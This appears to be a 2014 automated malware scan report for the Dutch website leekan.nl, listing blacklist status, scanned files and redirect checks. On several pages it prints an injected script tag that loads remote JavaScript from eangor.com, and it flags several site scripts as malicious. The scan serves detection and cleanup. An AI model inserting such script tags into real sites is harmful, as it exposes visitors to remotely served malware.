Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=leekan.nl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://leekan.nl/ | 200 OK Content-Length: 6948 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://eangor.com/24/ZsA9L1dO.php?id=4052206" type="text/javascript"></script> | ||
http://leekan.nl/res/swfobject.js | 200 OK Content-Length: 31036 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)  var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash", FLASH_MIME_TYPE = "application/x-shockwave-flash", EXPRESS_INSTALL_ID = "SWFObjectExprInst", ON_READY_STATE_CHANGE = "onreadystatechange", win = window, doc = document, nav = navigator, plugin = false, domLoadFnArr = [main], regObjArr = [], objI Antivirus reports:
| ||
http://leekan.nl/res/jquery.js | 200 OK Content-Length: 97217 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cu(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cr(a){if(!cg[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch);if(!ci||!ch.createElement)ci=(ch.contentWindow||ch.contentDocument).document,ci.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"") "<html><body>"),ci.close();d=c Antivirus reports:
| ||
http://leekan.nl/res/x5engine.js | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://leekan.nl/res/x5cartengine.js | 200 OK Content-Length: 54640 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) _jq.extend(x5engine.imCart, { _restoreSpecialChars: function (str) { return str.replace(/\{1\}/g, "'").replace(/\{2\}/g, "\"").replace(/\{3\}/g, "\\").replace(/\{4\}/g, "<").replace(/\{5\}/g, ">") }, // Test if cookies are working in the current browser _testCookie: function () { _jq.imCookie("imCookieTest", "test_content"); if (_jq.imCookie("imCookieTest") == "test_content") return true; return false; }, // Get the product array /*/f82c4e*/ Antivirus reports:
| ||
http://leekan.nl/res/l10n.js | 200 OK Content-Length: 20966 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) x5engine.l10n.addLocalization('admin_comment_abuse', 'Dit bericht is als misbruik aangemerkt'); x5engine.l10n.addLocalization('admin_seo_auth', 'Meldt u aan bij uw Google Webmaster Tools account'); x5engine.l10n.addLocalization('admin_seo_crawl_mex', 'Berichten van Google Bot'); x5engine.l10n.addLocalization('admin_seo_home', 'Resultaten indexering'); x5engine.l10n.addLocalization('admin_seo_keys', 'Geïndexeerde kernwoorden'); x5engine.l10n.addLocalization('admin_seo_message Antivirus reports:
| ||
http://leekan.nl/res/x5settings.js | 200 OK Content-Length: 7222 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) x5engine.imQueue.push_init("x5engine.imDate('.imDate')"); x5engine.imQueue.push_init("x5engine.imHour('.imHour')"); x5engine.imQueue.push_init("x5engine.imAccess.showLogout()"); x5engine.imQueue.push_init("x5engine.utils.autoHeight()"); x5engine.imQueue.push_init("x5engine.imCart.updateWidget()"); x5engine.imQueue.push_init("x5engine.imCart.setupProductList()"); x5engine.imQueue.push_init("x5engine.imGrid.init()"); x5engine.imQueue.push_init("x5engine.imMenu.setup({ t Antivirus reports:
| ||
http://leekan.nl/index.html | 200 OK Content-Length: 6948 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://eangor.com/24/ZsA9L1dO.php?id=4052206" type="text/javascript"></script> | ||
http://leekan.nl/mail.html | 200 OK Content-Length: 8794 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://eangor.com/24/ZsA9L1dO.php?id=4052207" type="text/javascript"></script> | ||
http://leekan.nl/login-catalog.php | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 06 Nov 2014 16:06:53 GMT Pragma: no-cache Location: imlogin.php Server: nginx Content-Length: 5737 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=hagme3m4nk9v9pucdn45f0ln83; path=/ X-Powered-By: PleskLin | clean |
http://leekan.nl/imlogin.php | 200 OK Content-Length: 4354 Content-Type: text/html | clean |
http://eangor.com/24/ZsA9L1dO.php?id=4052204 | HTTP/1.1 302 Found Connection: close Date: Thu, 06 Nov 2014 16:06:56 GMT Location: http://host145.hostmonster.com/suspended.page/disabled.cgi/eangor.com?id=4052204 Server: cloudflare-nginx Content-Type: text/html; charset=iso-8859-1 CF-RAY: 18528a8957760b02-WAW Set-Cookie: __cfduid=da1f6812271e591e8aaf13b121ae2f5bc1415290016217; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.eangor.com; HttpOnly | clean |
http://host145.hostmonster.com/suspended.page/disabled.cgi/eangor.com?id=4052204 | 200 OK Content-Length: 4780 Content-Type: text/html | clean |
http://host145.hostmonster.com/test404page.js | 404 Not Found Content-Length: 28 Content-Type: text/html | clean |
http://leekan.nl/imsitemap.html | 200 OK Content-Length: 4179 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://eangor.com/24/ZsA9L1dO.php?id=4052205" type="text/javascript"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: leekan.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Nov 2014 16:06:50 GMT
Accept-Ranges: bytes
ETag: "52d1fb77-1b24"
Server: nginx
Content-Length: 6948
Content-Type: text/html
Last-Modified: Sun, 12 Jan 2014 02:18:31 GMT
X-Powered-By: PleskLin
...6948 bytes of data.
GET / HTTP/1.1
Host: leekan.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Nov 2014 16:06:50 GMT
Accept-Ranges: bytes
ETag: "52d1fb77-1b24"
Server: nginx
Content-Length: 6948
Content-Type: text/html
Last-Modified: Sun, 12 Jan 2014 02:18:31 GMT
X-Powered-By: PleskLin
...6948 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: leekan.nl
Referer: http://www.google.com/search?q=leekan.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: leekan.nl
Referer: http://www.google.com/search?q=leekan.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.